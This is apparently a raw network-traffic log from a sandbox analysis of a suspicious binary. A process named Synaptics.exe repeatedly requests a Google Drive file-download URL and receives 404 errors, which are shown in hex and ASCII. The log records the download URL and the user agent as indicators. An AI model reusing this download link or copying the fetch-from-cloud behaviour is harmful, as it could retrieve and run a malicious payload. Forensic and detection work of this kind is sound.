                                                                                                                                                                                        2022-05-17 11:31:53 UTC546INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 36 48 62 46 32 51 78 6d 38 42 6c 4b 55 6e 51 7a 42 2b 4a 5a 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Z6HbF2Qxm8BlKUnQzB+JZg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:53 UTC547INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:53 UTC547INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        179192.168.2.349950142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:53 UTC544OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:53 UTC548INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:53 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-ew8xfpwUT3jdzyf40w6RgQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:53 UTC549INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:53 UTC549INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 42 74 4e 65 4b 7a 36 44 73 48 68 4b 54 68 77 47 58 69 41 4e 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WBtNeKz6DsHhKThwGXiANw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:53 UTC550INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:53 UTC550INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        18192.168.2.349754142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:31 UTC53OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:31 UTC56INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:31 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Qjb32Z4hcdE5/PfJxLLILw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:31 UTC58INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 36 63 34 59 76 69 36 42 6b 72 2f 4e 7a 55 62 32 67 64 6a 52 30 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6c4Yvi6Bkr/NzUb2gdjR0g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:31 UTC59INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:31 UTC59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        180192.168.2.349951142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:53 UTC547OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:54 UTC551INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:53 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-5qHsxeEV9/Tzt5jWGZ0FZw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:54 UTC552INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:54 UTC552INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 71 34 48 66 36 38 6b 64 69 67 76 64 61 61 6b 63 74 34 4c 6f 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mq4Hf68kdigvdaakct4LoA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:54 UTC553INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:54 UTC553INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        181192.168.2.349953142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:53 UTC550OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:54 UTC554INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:54 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-uqoUDkeFuuiaLH7HH40Iew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:54 UTC555INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:54 UTC555INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 36 66 72 46 77 44 65 73 6c 34 4f 46 43 70 55 71 51 73 79 70 30 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6frFwDesl4OFCpUqQsyp0w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:54 UTC556INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:54 UTC556INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        182192.168.2.349954142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:54 UTC553OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:54 UTC557INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:54 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-uFte/mybb6Db9PVH6aZRBQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:54 UTC558INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
